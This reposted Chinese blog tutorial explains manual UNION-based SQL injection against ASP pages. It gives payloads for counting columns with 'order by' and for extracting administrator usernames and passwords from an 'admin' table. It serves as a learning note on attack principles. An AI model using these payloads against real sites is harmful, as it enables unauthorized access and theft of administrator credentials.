博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
1.2 SQL注入原理-手工联合查询
阅读量:4692 次
发布时间:2019-06-09

本文共 419 字,大约阅读时间需要 1 分钟。

欢迎拜访我的新博客~~

1.2 SQL注入原理-手工联合查询

  1. 使用条件:和上一遍笔记相同,即链接以【.asp?id=】结尾。

    检测字段长度

  2. 在链接后面添加语句【order by 11】,页面显示正常。

    这里的order是数据库里的排序语句,order by 11 表明将内容以第11个字段排序。
    1141474-20170511180905222-29816714.png

  3. 添加语句【order by 12】,页面报错。说明此站的字段长度为11。

爆破管理员用户名、密码

  1. 在链接后面添加【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字2和3。

    union select是联合查询语句
    1141474-20170511180915051-1232243457.png

  2. 在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码。

    1141474-20170511180931160-253040734.png

转载于:https://www.cnblogs.com/xieldy/p/6842123.html

你可能感兴趣的文章